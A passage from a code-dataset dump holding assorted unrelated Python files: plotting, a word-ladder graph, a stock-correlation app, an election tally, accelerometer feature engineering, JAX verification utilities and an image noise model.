(inDimension,outDimension) in zip(inDims,outDims): \n    name ='MIMO ' + str(inDimension) + 'x' + str(outDimension)\n    path = valPath + name + '/Checkpoints/'\n    \n    start_time = time.time()\n    numTrials=int(NUMTRIALS/(inDimension*outDimension))\n    sig = 
Signal(inDimension,outDimension,numTrials,numPlots=plots)\n\n # In this case, since we are only loading the model, not trying to train it,\n # we can use function simulate and preprocess \n xData,yData = sig.system_validation_multi(disturbance=False,b_possible_values=[.299,.3005],a_possible_values=[.899,.9005],\n k_possible_values=[0,1])\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n \n # Initialize the models that are saved using the parameters declared above\n predictor = Model()\n predictor.load_model(sig,path)\n \n sns.set_style('dark')\n # Function to make predictions based off the simulation \n kp_yhat = predictor.predict_multinomial(sig,stepResponse=False)\n #tau_yhat = self.modelDict['tau'](sig.xData['tau'])\n #theta_yhat = self.modelDict['theta'](sig.xData['theta'])\n fig, ax_nstd = plt.subplots(figsize=(6, 6),dpi=200)\n #ax_nstd.set_xlim([0.475,0.535])\n #ax_nstd.set_ylim([0.475,0.535])\n \n x=predictor.results['a'];y=predictor.results['b']\n confidence_ellipse(x, y, ax_nstd, n_std=1,\n label=r'$1\\sigma$', edgecolor='firebrick')\n confidence_ellipse(x, y, ax_nstd, n_std=2,\n label=r'$2\\sigma$', edgecolor='fuchsia', linestyle='--')\n confidence_ellipse(x, y, ax_nstd, n_std=3,\n label=r'$3\\sigma$', edgecolor='blue', linestyle=':')\n\n ax_nstd.scatter(predictor.results['a'], predictor.results['b'], s=3)\n #ax_nstd.set_title('Different standard deviations')\n plt.ylabel('Coefficient a')\n plt.xlabel('Coefficient b')\n ax_nstd.legend(loc='lower left')\n plt.grid()\n plt.show()\n \n print(\"--- %s seconds ---\" % (time.time() - start_time))\n \n ","sub_path":"src/Plot_ellipses.py","file_name":"Plot_ellipses.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"293176359","text":"# Author: Griffin Melnick, melnig@rpi.edu\n# File: word_ladder.py\n# Purpose: A game using word ladders to connect a start word to an end word.\n# => Look at https://en.wikipedia.org/wiki/Word_ladder for more\n# information about the game.\n# => This code comes from:\n# https://github.com/networkx/networkx/blob/master/examples/graph/words.py\n\nimport networkx as nx\n\n#-------------------------------------------------------------------\n# The Words/Ladder graph of Section 1.1\n#-------------------------------------------------------------------\ndef generate_graph(words):\n from string import ascii_lowercase as lowercase\n G = nx.Graph(name=\"words\")\n lookup = dict((c,lowercase.index(c)) for c in lowercase)\n def edit_distance_one(word):\n for i in range(len(word)):\n left, c, right = word[0:i], word[i], word[i+1:]\n j = lookup[c] # lowercase.index(c)\n for cc in lowercase[j+1:]:\n yield left + cc + right\n yield right + cc + left\n yield cc + left + right\n yield cc + right + left\n yield left + right + cc\n yield right + left + cc\n candgen = ((word, cand) for word in sorted(words)\n for cand in edit_distance_one(word) if cand in words)\n G.add_nodes_from(words)\n for word, cand in candgen:\n G.add_edge(word, cand)\n return G\n\ndef words_graph():\n \"\"\"Return the words example graph from the Stanford GraphBase\"\"\"\n import gzip\n fh=gzip.open('words_dat.txt.gz','r')\n words=set()\n for line in fh.readlines():\n line = line.decode()\n if line.startswith('*'):\n continue\n w=str(line[0:5])\n words.add(w)\n return generate_graph(words)\n\nif __name__ == '__main__':\n from networkx import *\n G=words_graph()\n # print(\"Loaded words_dat.txt containing 5757 five-letter English words.\")\n # 
print(\"Two words are connected if they differ in one letter.\")\n # print(\"Graph has %d nodes with %d edges\"\n # %(number_of_nodes(G),number_of_edges(G)))\n # print(\"%d connected components\" % number_connected_components(G))\n\n # for (source,target) in [('chaos','order'),\n # ('nodes','graph'),\n # ('moron','smart'),\n # ('pound','marks'),('queue','choir')]:\n # print(\"Shortest path between %s and %s is:\"%(source,target))\n # try:\n # sp=shortest_path(G, source, target)\n # for n in sp:\n # print(n)\n # except nx.NetworkXNoPath:\n # print(\"None\")\n\n # print()\n\n # for elem in G:\n # d = 0\n # e = \"\"\n # if len(G[elem]) > d:\n # d = len(G[elem])\n # e = elem\n # print(elem)\n\n n = 0\n for elem in G[\"shape\"]:\n n += len(G[elem])\n print(n)\n","sub_path":"labs/lab06/word_ladder.py","file_name":"word_ladder.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"246128439","text":"import streamlit as st\r\nimport yfinance as yf\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nst.write(\"\"\"\r\n# Stock Correlation Application\r\nInsert two stocks to determine how strongly correlated they are\r\n\"\"\")\r\n\r\nstock_1 = st.text_input(\"Insert Ticker Symbol for First Stock (e.g., AAPL)\")\r\nstock_2 = st.text_input(\"Insert Ticker Symbol for Second Stock (e.g., AMZN)\")\r\n\r\nif stock_2 and stock_1:\r\n\r\n #get data on this ticker\r\n\r\n stock_1_tickerData = yf.Ticker(stock_1)\r\n stock_2_tickerData = yf.Ticker(stock_2)\r\n\r\n #get the historical prices for this ticker\r\n stock_1_tickerDf = stock_1_tickerData.history(period='max').reset_index()\r\n stock_2_tickerDf = stock_2_tickerData.history(period= 'max').reset_index()\r\n\r\n stock_1_tickerDf['stock'] = stock_1\r\n stock_2_tickerDf['stock'] = stock_2\r\n\r\n min_stock_1 = min(stock_1_tickerDf['Date'])\r\n min_stock_2 = min(stock_2_tickerDf['Date'])\r\n\r\n max_min_stock_date = max([min_stock_1, min_stock_2])\r\n\r\n stock_1_tickerDf = stock_1_tickerDf.loc[stock_1_tickerDf['Date'] >= max_min_stock_date]\r\n stock_2_tickerDf = stock_2_tickerDf.loc[stock_2_tickerDf['Date'] >= max_min_stock_date]\r\n\r\n df_1 = stock_2_tickerDf\r\n df_2 = stock_2_tickerDf\r\n\r\n stock_1_tickerDf.columns = ['Date', 'stock_1_Open', 'stock_1_High', 'stock_1_Low', 'stock_1_Close', 'stock_1_Volume', 'stock_1_Dividends',\r\n 'stock_1_Stock Splits', 'stock_1']\r\n\r\n stock_2_tickerDf.columns = ['Date', 'stock_2_Open', 'stock_2_High', 'stock_2_Low', 'stock_2_Close', 'stock_2_Volume', 'stock_2_Dividends',\r\n 'stock_2_Stock Splits', 'stock_2']\r\n\r\n bigdata = stock_1_tickerDf.merge(stock_2_tickerDf, how = 'inner', on = 'Date')\r\n\r\n correlation = round(bigdata.stock_1_Close.corr(bigdata.stock_2_Close),2)\r\n\r\n st_plot = bigdata[['Date', 'stock_1_Close','stock_2_Close']]\r\n st_plot.columns = ['Date', \"{0} Stock Price\".format(stock_1), \"{0} Stock Price\".format(stock_2)]\r\n\r\n df = st_plot.melt('Date', var_name='stock', value_name='value')\r\n\r\n\r\n sns.set(font=\"IBM Plex Sans\", style='white')\r\n color_palette = ['29bf89','0083BB']\r\n fig, ax = plt.subplots()\r\n ax = sns.lineplot(x = 'Date', y = st_plot.iloc[:,1], data=st_plot, color='seagreen')\r\n ax2 = plt.twinx()\r\n ax= sns.lineplot(data=st_plot, color='royalblue', ax=ax2, x = 'Date', y = st_plot.iloc[:,2])\r\n ax.set_title(\"The correlation between {0} and {1} is: {2} \".format(stock_1, stock_2, correlation))\r\n plt.figure(facecolor='w')\r\n 
fig.legend(labels=[\"{0} Stock\".format(stock_1),\"{0} Stock\".format(stock_2)],loc=\"upper center\", bbox_to_anchor=(0.5, 1.05), ncol=2)\r\n\r\n    st.pyplot(fig)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"stock_correlations.py","file_name":"stock_correlations.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"630383148","text":"import os\r\nimport csv\r\n\r\ncsvpath = os.path.join('Resources', 'election_data.csv')\r\n\r\nwith open(csvpath) as csvfile:\r\n\r\n# CSV reader specifies delimiter and variable that holds contents\r\n    csvreader = csv.reader(csvfile, delimiter=',')\r\n\r\n    #print(csvreader)\r\n\r\n    # Read the header row first (skip this step if there is no header)\r\n    csv_header = next(csvreader)\r\n    #print(f\"CSV Header: {csv_header}\")\r\n    \r\n    # Checking num columns and rows\r\n    # print(len(row)) \r\n    # Total number of votes\r\n    Num_row = len(open(csvpath).readlines()) - 1\r\n    # print(Num_row)\r\n\r\n    Candidate = \"\"\r\n    voteKhan = 0\r\n    voteCorrey = 0\r\n    voteLi = 0\r\n    voteOTooley = 0\r\n    for row in csvreader:\r\n        if row[2] == \"Khan\":\r\n            voteKhan = voteKhan + 1\r\n        if row[2] == \"Correy\":\r\n            voteCorrey = voteCorrey + 1\r\n        if row[2] == \"Li\":\r\n            voteLi = voteLi + 1\r\n        if row[2] == \"O'Tooley\":\r\n            voteOTooley = voteOTooley + 1\r\n\r\n    # Determine the winner from the tallies instead of hardcoding a name\r\n    tallies = {\"Khan\": voteKhan, \"Correy\": voteCorrey, \"Li\": voteLi, \"O'Tooley\": voteOTooley}\r\n    winner = max(tallies, key=tallies.get)\r\n\r\n    print(\"Election Results\")\r\n    print(\"----------------------\")\r\n    print(\"Total Votes:\", Num_row)\r\n    print(\"Khan:\", (\"{:.3f}\".format(100*voteKhan/Num_row)), \"% (\", voteKhan, \")\" )\r\n    print(\"Correy:\", (\"{:.3f}\".format(100*voteCorrey/Num_row)), \"% (\", voteCorrey, \")\" )\r\n    print(\"Li:\", (\"{:.3f}\".format(100*voteLi/Num_row)), \"% (\", voteLi, \")\" )\r\n    print(\"O'Tooley:\", (\"{:.3f}\".format(100*voteOTooley/Num_row)), \"% (\", voteOTooley, \")\" )\r\n    print(\"----------------------\")\r\n    print(\"Winner:\", winner)\r\n    print(\"----------------------\")\r\n\r\n    with open(\"pypoll_final_result.text\", 'w') as text:\r\n        text.write('Election Results \\n')\r\n        text.write('----------------------------------- \\n')\r\n        text.write(f'Total Votes: {Num_row} \\n')\r\n        text.write('----------------------------------- \\n')\r\n        text.write(f'Khan: {(\"{:.3f}\".format(100*voteKhan/Num_row))}% ({voteKhan}) \\n')\r\n        text.write(f'Correy: {(\"{:.3f}\".format(100*voteCorrey/Num_row))}% ({voteCorrey}) \\n')\r\n        text.write(f'Li: {(\"{:.3f}\".format(100*voteLi/Num_row))}% ({voteLi}) \\n')\r\n        text.write(f'O Tooley: {(\"{:.3f}\".format(100*voteOTooley/Num_row))}% ({voteOTooley}) \\n')\r\n        text.write('----------------------------------- \\n')\r\n        text.write(f'Winner: {winner} \\n')\r\n        text.write('----------------------------------- \\n')\r\n\r\n\r\n    \r\n\r\n\r\n\r\n","sub_path":"PyBank/mainPyPoll.py","file_name":"mainPyPoll.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"364168863","text":"import os\nimport numpy as np\nimport pandas as pd\n\n\n# Helper functions.\ndef zero_crossing(x):\n    \"\"\"\n    Count the number of times the signal value changed signs.\n    \"\"\"\n    return sum((x.iloc[:-1] * x.shift(-1).iloc[:-1]) < 0)\n\n\ndef percentile(p):\n    \"\"\"\n    Helper function to compute percentile p.\n    \"\"\"\n    def percentile_(x):\n        return np.percentile(x, p)\n    percentile_.__name__ = 'percentile_%s' % p\n    return percentile_\n\n\ndef add_mean_last3(w1_df, w10_df):\n    \"\"\"\n    Compute mean of last 3 seconds from each 10-second window and join 
back\n to w10 dataframe.\n \"\"\"\n new = w1_df.groupby(['pid', 'window10']).tail(3).groupby(['pid', 'window10']).mean().reset_index()\\\n .drop(['window1'], axis=1)\n new.columns = ['_'.join([col, 'last3']) for col in new.columns.values]\n new = new.rename(columns={'pid_last3': 'pid',\n 'window10_last3': 'window10'})\n return pd.merge(w10_df, new, how='left', on=['pid', 'window10'])\n\n\ndef add_mean_first3(w1_df, w10_df):\n \"\"\"\n Compute mean of first 3 seconds from each 10-second window \n and join back to w10 dataframe.\n \"\"\"\n new = w1_df.groupby(['pid', 'window10']).head(3).groupby(['pid', 'window10']).mean().reset_index()\\\n .drop(['window1'], axis=1)\n new.columns = ['_'.join([col, 'first3']) for col in new.columns.values]\n new = new.rename(columns={'pid_first3': 'pid',\n 'window10_first3': 'window10'})\n return pd.merge(w10_df, new, how='left', on=['pid', 'window10'])\n\n\n# Windowing functions.\ndef pivot_window_10s_from_ms(df):\n \"\"\"\n Given millisecond-level data, compute 'mean', median', 'min', 'max', 'std', \n percentiles, and zero-crossing per 10-second window.\n Pivot into a single row (uniquely identified by window10-pid).\n \"\"\"\n df['window10'] = np.floor(df['time'] / 10000).astype(int)\n df = df.groupby(['pid', 'window10'])[['x', 'y', 'z']]\\\n .agg(['mean', 'median', 'min', 'max', 'std',\n percentile(5), percentile(25), percentile(75), percentile(95), zero_crossing])\n df.columns = ['_'.join([str(c) for c in col]).strip()\n for col in df.columns.values]\n df = df.reset_index()\n return df.reset_index()\n\n\ndef pivot_window_1s(df):\n \"\"\"\n Compute 'mean', median', 'min', 'max', 'std' per 1-second window per pid \n and pivot into a single row (uniquely identified by window1-pid).\n\n Input df columns: ['x', 'y', 'z']\n Output df columns: ['x_median', 'x_min',...'z_median']\n \"\"\"\n df['window1'] = np.floor(df['time'] / 1000).astype(int)\n df = df.groupby(['pid', 'window1'])[['x', 'y', 'z']]\\\n .agg(['mean', 'median', 'min', 'max', 'std'])\n df.columns = ['_'.join([str(c) for c in col]).strip()\n for col in df.columns.values]\n return df.reset_index()\n\n\ndef pivot_window_10s_from_1s(df):\n \"\"\"\n Calls pivot_window_1s to compute 1-second window metrics.\n\n Compute 'mean', median', 'min', 'max', 'std', 'first3_mean', 'last3_mean',\n of computed 1-second window metrics per 10-second window per pid \n and pivot into a single row (uniquely identified by window10-pid).\n\n Input df columns: ['x_median', 'y_median','z_median',...]\n Output df columns: ['x_median_mean', 'y_median_mean', 'z_median_mean', 'x_median_median',...]\n \"\"\"\n w1 = pivot_window_1s(df)\n w1['window10'] = np.floor(w1['window1'] / 10).astype(int)\n two_tier_df = w1.groupby(['pid', 'window10'])[w1.drop(['pid', 'window1', 'window10'], axis=1).columns]\\\n .agg(['mean', 'median', 'min', 'max', 'std'])\n two_tier_df.columns = ['_'.join([str(c) for c in col]).strip()\n for col in two_tier_df.columns.values]\n two_tier_df = two_tier_df.reset_index()\n # Compute mean of first and last 3 seconds within the 10-second window.\n two_tier_df = add_mean_last3(w1, two_tier_df)\n two_tier_df = add_mean_first3(w1, two_tier_df)\n # Impute nan standard deviation (when window10 is a single row) as 0.\n two_tier_df = two_tier_df.fillna(0)\n return two_tier_df\n\n\ndef two_tier_windowing(df):\n \"\"\"\n Run single and two-tier windowing functions \n and merge generated features together.\n\n Returns a dataframe with all features.\n \"\"\"\n single_tier = pivot_window_10s_from_ms(df)\n two_tier = 
pivot_window_10s_from_1s(df)\n return pd.merge(single_tier, two_tier, how='left', on=['pid', 'window10'])\n\n\ndef run_feature_engineering(acc_path):\n \"\"\"\n Load each preprocessed accelerometer file and\n create all features using two-tiered windowing.\n \n Returns a concatenated dataframe with\n accelerometer data for all participants.\n \"\"\"\n dfs = []\n directory = os.fsencode(acc_path)\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n if filename != '.DS_Store':\n print(filename)\n df = pd.read_pickle(acc_path + filename)\n df = two_tier_windowing(df)\n dfs.append(df)\n return pd.concat(dfs).reset_index().drop(columns=['level_0', 'index'], axis=1)\n\n\n# Joining target to features.\ndef reconcile_acc_tac(acc, tac):\n \"\"\"\n Merge target \"intoxicated\" variable onto windowed accelerometer df by taking the most \n recent target value where tac timestamp (10s window) <= acc timestamp (10s window)\n for a given pid.\n \"\"\"\n # Create window10 timestamp on tac df.\n tac['window10'] = np.floor(tac['timestamp'] / 10).astype(int)\n # Sort both df by window10.\n acc = acc.sort_values(['window10'], ascending=True)\n tac = tac.sort_values(['window10'], ascending=True)\n # Merge the last row in tac whose tac timestamp <= to the acc timestamp.\n return pd.merge_asof(acc, tac, on='window10', by='pid').reset_index(drop=True)\n\n","sub_path":"feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":5769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458557450","text":"sim_t = \"Simulator\"\nproj_t = \"Project\"\npref_t = \"Prefetcher\"\nbench_t = \"Benchmark\"\n\nstat_t = \"Statistic Tag\"\n\nipc_t = \"IPC\"\nallAcc_t = \"All Accesses\"\nallMiss_t = \"All Misses\"\nprefAcc_t = \"Prefetcher Accesses\"\nprefs_t = \"Prefetches\"\naccPref_t = \"Accurate Prefetches\"\n\ndata_tags = [ipc_t,allAcc_t,allMiss_t,prefAcc_t,prefs_t,accPref_t]\nall_tags = [proj_t,pref_t,bench_t] + data_tags\n","sub_path":"branch_predictor/cbp2014/results/analysis/scripts/tools/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"321849809","text":"import handler\r\nimport helpers\r\nimport wishDB\r\nimport messageDB\r\n\r\nclass Wish():\r\n\tpass\r\n\t\t\r\nclass AdminWishlistHandler(handler.Handler):\r\n\t@helpers.login_required\r\n\tdef get(self):\t\r\n\t\twishes = []\r\n\t\tresults = wishDB.Wish.all().order('-created').run(limit=10)\r\n\t\t\r\n\t\tfor wish in results:\r\n\t\t\tid = int(wish.key().id())\r\n\t\t\tres_msg = messageDB.Message.all().filter(\"wish_id =\", id)\r\n\t\t\twi = Wish()\r\n\t\t\twi.wish = wish\r\n\t\t\twi.messages = []\r\n\t\t\twi.msg_date = []\r\n\t\t\tif res_msg:\r\n\t\t\t\tfor msg in res_msg:\r\n\t\t\t\t\twi.messages.append(msg.content)\r\n\t\t\t\t\twi.msg_date.append(msg.created)\r\n\t\t\twi.messages.sort(reverse = True)\r\n\t\t\twishes.append(wi)\r\n\t\tself.render(\"admin/wishlist-admin.html\", wishes = wishes)\r\n\t\r\n\t@helpers.login_required\r\n\tdef post(self):\r\n\t\tid = int(self.request.get('id'))\r\n\t\twishes = []\r\n\t\tlast_wish = wishDB.Wish.get_by_id(id)\r\n\t\tresults = wishDB.Wish.all()\r\n\t\tresults.filter('created <', last_wish.created)\r\n\t\tresults.order('-created').run(limit=10)\r\n\t\t\r\n\t\t\r\n\t\tfor wish in results:\r\n\t\t\t#wishes.append(wish)\r\n\t\t\tid = int(wish.key().id())\r\n\t\t\tres_msg = 
messageDB.Message.all().filter(\"wish_id =\", id)\r\n\t\t\twi = wishDB.Wish()\r\n\t\t\twi.wish = wish\r\n\t\t\twi.messages = []\r\n\t\t\twi.msg_date = []\r\n\t\t\tif res_msg:\r\n\t\t\t\tfor msg in res_msg:\r\n\t\t\t\t\twi.messages.append(msg.content)\r\n\t\t\t\t\twi.msg_date.append(msg.created)\r\n\t\t\twi.messages.sort(reverse = True)\r\n\t\t\twishes.append(wi)\r\n\t\t\t\r\n\t\tself.render(\"admin/load-wishes-admin.html\", wishes = wishes)","sub_path":"adminwishlist.py","file_name":"adminwishlist.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"397617575","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, models\nfrom odoo.addons.l10n_gt_extra import a_letras\n\nclass ReportAbstractPayment(models.AbstractModel):\n _name = 'onyx.abstract.reporte_account_payment'\n\n def fecha_a_letras(self,fecha):\n fecha_letras = \"\"\n dia = fecha.strftime('%d')\n mes = int(fecha.strftime('%m'))\n mes_letras = a_letras.mes_a_letras(mes-1)\n anio = fecha.strftime('%Y')\n fecha_letras = dia + \" de \" + mes_letras.capitalize() + \" del \" + anio\n return fecha_letras\n\n def totales(self, o):\n t = {'debito': 0, 'credito': 0}\n for l in o.move_id.line_ids:\n t['debito'] += l.debit\n t['credito'] += l.credit\n return t\n\n def _get_report_values(self, docids, data=None):\n model = 'account.payment'\n docs = self.env['account.payment'].browse(docids)\n\n return {\n 'doc_ids': docids,\n 'doc_model': model,\n 'docs': docs,\n 'data': data,\n 'a_letras': a_letras.num_a_letras,\n 'fecha_a_letras': self.fecha_a_letras,\n 'totales': self.totales,\n }\n\nclass ReportPayment1(models.AbstractModel):\n _name = 'report.onyx.reporte_account_payment1'\n _inherit = 'onyx.abstract.reporte_account_payment'\n","sub_path":"report/report_payment.py","file_name":"report_payment.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152792249","text":"# coding=utf-8\n# Copyright 2021 The jax_verify Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Utils used for JAX neural network verification.\"\"\"\n\nimport os\nfrom typing import Any, Callable, Dict, Sequence, Union\nimport jax\nimport jax.numpy as jnp\nfrom jax_verify.src import bound_propagation\nimport numpy as np\nimport urllib.request\n\n\nTensor = bound_propagation.Tensor\nBound = bound_propagation.Bound\n\n######## File Loading ########\n\ndef open_file(name, *open_args, **open_kwargs):\n \"\"\"Load file, downloading to /tmp/jax_verify first if necessary.\"\"\"\n local_root = '/tmp/jax_verify'\n local_path = os.path.join(local_root, name)\n if not os.path.exists(os.path.dirname(local_path)):\n os.makedirs(os.path.dirname(local_path))\n if not os.path.exists(local_path):\n gcp_bucket_url = 'https://storage.googleapis.com/deepmind-jax-verify/'\n download_url = gcp_bucket_url + name\n urllib.request.urlretrieve(download_url, local_path)\n return 
open(local_path, *open_args, **open_kwargs)\n\n######### Miscellaneous #########\n\n\ndef bind_nonbound_args(\n fun: Callable[..., Tensor],\n *all_in_args: Union[Bound, Tensor],\n **kwargs\n) -> Callable[..., Tensor]:\n \"\"\"Take a function and bind all keyword arguments and non-bound arguments.\"\"\"\n\n def tensorbound_fun(*bound_args):\n fun_inps = []\n bound_arg_pos = 0\n for arg in all_in_args:\n if isinstance(arg, Bound):\n fun_inps.append(bound_args[bound_arg_pos])\n bound_arg_pos += 1\n else:\n fun_inps.append(arg)\n assert len(bound_args) == bound_arg_pos\n return fun(*fun_inps, **kwargs)\n return tensorbound_fun\n\n\ndef filter_jaxverify_kwargs(kwargs: Dict[str, Any]) -> Dict[str, Any]:\n if 'jax_verify_keepjvargs' in kwargs and kwargs['jax_verify_keepjvargs']:\n return kwargs\n else:\n return {k: v for k, v in kwargs.items()\n if not k.startswith('jax_verify_subgraph')}\n\n\ndef simple_propagation(fn):\n \"\"\"Create a wrapper function to ignore the context argument.\"\"\"\n def wrapper(context, *args, **kwargs):\n del context\n params = filter_jaxverify_kwargs(kwargs)\n return fn(*args, **params)\n return wrapper\n\n\ndef batch_value_and_grad(fun, batch_dims, *args, **kwargs):\n \"\"\"Equivalent to jax `value_and_grad` function but allows batched function.\n\n This is to go around the fact that jax.value_and_grad only supports scalar\n outputs.\n\n Args:\n fun: Function, operating in batch, to obtain gradients for.\n batch_dims: Dimensions to batch over.\n *args: Positional arguments for jax.value_and_grad\n **kwargs: Named arguments for jax.value_and_grad.\n Returns:\n batch_value_and_grad_fn: Function returning the value and gradients of the\n batched function\n \"\"\"\n add_batch_dim = lambda x: jnp.expand_dims(x, batch_dims)\n remove_batch_dim = lambda x: x.squeeze(batch_dims)\n def nobatch_fun(*nobatch_inps):\n batch_inps = jax.tree_util.tree_multimap(add_batch_dim, nobatch_inps)\n batch_out = fun(*batch_inps)\n nobatch_out = jax.tree_util.tree_multimap(remove_batch_dim, batch_out)\n return nobatch_out\n nobatch_value_and_grad = jax.value_and_grad(nobatch_fun, *args, **kwargs)\n\n batch_value_and_grad_fn = nobatch_value_and_grad\n for batch_dim in batch_dims:\n batch_value_and_grad_fn = jax.vmap(batch_value_and_grad_fn,\n in_axes=batch_dim, out_axes=batch_dim)\n return batch_value_and_grad_fn\n\n\ndef objective_chunk(\n obj_shape: Sequence[int],\n chunk_index: int,\n nb_parallel_nodes: int,\n):\n \"\"\"Returns a one-hot tensor to select a chunk of elements from an objective.\n\n Args:\n obj_shape: Shape of the objective tensor to be chunked.\n chunk_index: Index of the optimization chunk to generate.\n nb_parallel_nodes: How large should the optimization chunks be. 
If 0,\n optimize all problems at once.\n Returns:\n One-hot tensor of shape (nb_parallel_nodes, *obj_shape) specifying,\n for each index in the chunk, an element of the objective.\n \"\"\"\n total_nb_nodes_to_opt = int(np.prod(obj_shape))\n\n start_node = chunk_index * nb_parallel_nodes\n if (nb_parallel_nodes == 0) or (total_nb_nodes_to_opt <= nb_parallel_nodes):\n nb_nodes_to_opt = total_nb_nodes_to_opt\n else:\n nb_nodes_to_opt = nb_parallel_nodes\n\n # In order to be able to use the function in the while loop, we have to have\n # all tensors remain the same size so we're going to always create a tensor\n # of the same size, but will not necessarily fill all the rows.\n flat_obj = jnp.zeros((nb_nodes_to_opt, total_nb_nodes_to_opt))\n opt_idx = jnp.arange(nb_nodes_to_opt)\n node_idx = jnp.minimum(start_node + opt_idx, total_nb_nodes_to_opt-1)\n to_add = ((start_node + opt_idx) < total_nb_nodes_to_opt).astype(jnp.float32)\n flat_obj = jax.ops.index_add(\n flat_obj, (opt_idx, node_idx), to_add,\n indices_are_sorted=True, unique_indices=False)\n obj = jnp.reshape(flat_obj, (nb_nodes_to_opt, *obj_shape))\n\n return obj\n\n\n","sub_path":"jax_verify/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"22920519","text":"from setuptools import setup, find_packages\nfrom os import path\n\n# grab the long_description from the readme file\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(name=\"mtdependencytest\",\n description=\"depends\",\n version=\"0.0.2\",\n packages=find_packages(),\n long_description = \"Sorry, long description not available.\",\n url = \"https://github.com/teese/mtdependencytest\",\n license = \"MIT\",\n classifiers=[\"Development Status :: 3 - Alpha\"],\n py_modules = [\"bla\"],\n keywords=\"lovely beautiful\"\n )","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"434502620","text":"import sqlite3 as lite\n\n\ncities = (('New York City','NY'),('Boston','MA'),('Chicago','IL'),('Miami','FL'),('Dallas','TX'),('Seattle','WA'),('Portland','OR'),('San Francisco','CA'),('Los Angeles','CA'))\nweather = (('New York City',2013,'July','January',62),('Boston',2013,'July','January',59),('Chicago',2013,'July','January',59),('Miami',2013,'August','January',84),('Dallas',2013,'July','January',77),('Seattle',2013,'July','January',61),('Portland',2013,'July','December',63),('San Francisco',2013,'September','December',64),('Los Angeles',2013,'September','December',75))\n\ncon = lite.connect('getting_started.db')\n\nwith con:\n\tcur = con.cursor()\n\tcur.execute(\"DROP TABLE cities\")\n\tcur.execute(\"DROP TABLE weather\")\n\tcur.execute(\"CREATE TABLE cities (city text, state text)\")\n\tcur.execute(\"CREATE TABLE weather (city text, year integer, warm_month text, cold_month text, average_high text)\")\n\tcur.executemany(\"INSERT INTO cities VALUES(?,?)\", cities)\n\tcur.executemany(\"INSERT INTO weather VALUES(?,?,?,?,?)\", weather)","sub_path":"rows_sqlite.py","file_name":"rows_sqlite.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"624180277","text":"import argparse\nimport numpy as np\nimport cv2\n\n\ndef 
get_noise_model(noise_type=\"gaussian,0,50\"):\n    tokens = noise_type.split(sep=\",\")\n\n    if tokens[0] == \"gaussian\":\n        min_stddev = int(tokens[1])\n        max_stddev = int(tokens[2])\n\n        def gaussian_noise(img):\n            noise_img = img.astype(np.float)\n            stddev = np.random.uniform(min_stddev, max_stddev)\n            noise = np.random.randn(*img.shape) * stddev\n            noise_img += noise\n            noise_img = np.clip(noise_img, 0, 255).astype(np.uint8)\n            return noise_img\n        return gaussian_noise\n    elif tokens[0] == \"clean\":\n        return lambda img: img\n\n\ndef get_args():\n    parser = argparse.ArgumentParser(description=\"test noise model\",\n                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument(\"--image_size\", type=int, default=256,\n                        help=\"training patch size\")\n    parser.add_argument(\"--noise_model\", type=str, default=\"gaussian,0,50\",\n                        help=\"noise model to be tested\")\n    args = parser.parse_args()\n    return args\n\n\ndef main():\n    args = get_args()\n    image_size = args.image_size\n    noise_model = get_noise_model(args.noise_model)\n\n    while True:\n        image = np.ones((image_size, image_size, 3), dtype=np.uint8) * 128\n        cv2.imshow(\"noise image\", noise_model(image))\n        key = cv2.waitKey(-1)\n\n        # \"q\": quit\n        if key == 113:\n            return 0\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"noise_model.py","file_name":"noise_model.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
